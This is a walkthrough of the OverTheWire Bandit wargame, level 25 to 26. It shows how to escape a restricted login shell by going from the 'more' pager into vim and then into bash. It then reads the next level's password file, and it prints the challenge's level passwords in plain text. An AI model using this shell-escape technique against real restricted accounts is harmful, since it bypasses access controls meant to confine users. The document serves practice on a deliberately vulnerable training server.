OverTheWire Bandit Level 25 → 26 tutorial!!

Login

Log in as bandit25 using the password you obtained from Level 24 → 25.

ssh bandit25@bandit.labs.overthewire.org -p 2220
# password: iCi86ttT4KSNe1armKiwbQNmB3YJP3q4

Why? Each Bandit level is a separate UNIX user. To solve 25 → 26, you must be the bandit25 user.

Task

The home directory contains a private SSH key for bandit26. However, the login shell of bandit26 is set to /usr/bin/showtext, which only runs the pager more on a file and then exits. Your job is to figure out how to break out of this restricted environment and obtain the password for bandit26.

A little bit of Theory

• Shell override: instead of /bin/bash, bandit26’s shell is /usr/bin/showtext.
• The script /usr/bin/showtext simply executes more ~/text.txt.
• Pager trick: when more is interactive (--More--), you can press v to launch vim.
• From vim, you can spawn a real shell with :!bash.

Further reading:

• more(1) manual
• Vim documentation

Solution

1. Inspect the home directory

   ls -la
   

   Why? Confirms the presence of the bandit26.sshkey file needed to connect.

   

2. Check the shell of bandit26

   grep '^bandit26:' /etc/passwd
   

   Output shows:

   bandit26:x:11026:11026:bandit level 26:/home/bandit26:/usr/bin/showtext
   

   Why? Confirms that bandit26 does not use /bin/bash but /usr/bin/showtext.

   

3. Inspect the showtext script

   cat /usr/bin/showtext
   

   It runs:

   #!/bin/sh
   export TERM=linux
   exec more ~/text.txt
   exit 0
   

   Why? Shows that bandit26 will always be dropped into more text.txt.

   

4. Login as bandit26 with the SSH key

   ssh -i bandit26.sshkey -p 2220 bandit26@localhost
   

   Why? Connects using the provided private key instead of a password.

   If your terminal is tall, more prints the whole file and exits immediately. → Fix: resize your terminal to ~10 lines tall so more shows --More--.

   

5. Escape into vim, then bash

   • Inside more, press v → this opens vim.

   • In vim, type:

      :set shell=/bin/bash
      :shell
     

   Why? This spawns a new shell, giving you full access as bandit26.

   

6. Read the password

   cat /etc/bandit_pass/bandit26
   

   Output:

   s0773xxkk0MXfdqOfPRVr9L3jJBUOgCZ
   

   Why? Prints the password for the next level.

   

Password

This is the password I got; copy yours from your own run.

s0773xxkk0MXfdqOfPRVr9L3jJBUOgCZ

Troubleshooting

• Immediately disconnected? → Shrink your terminal window so more pauses with --More--.
• Can’t escape? → Be sure you’re inside more. Press v to open vim, then :!bash.
• Permission errors on ssh key → Ignore; key is already properly restricted.

Congrats 🎉 You successfully escaped a restricted shell using more → vim → bash and obtained the credentials for bandit26!

Thanks for reading!

Until next time — Otsumachi!! 💖☄️✨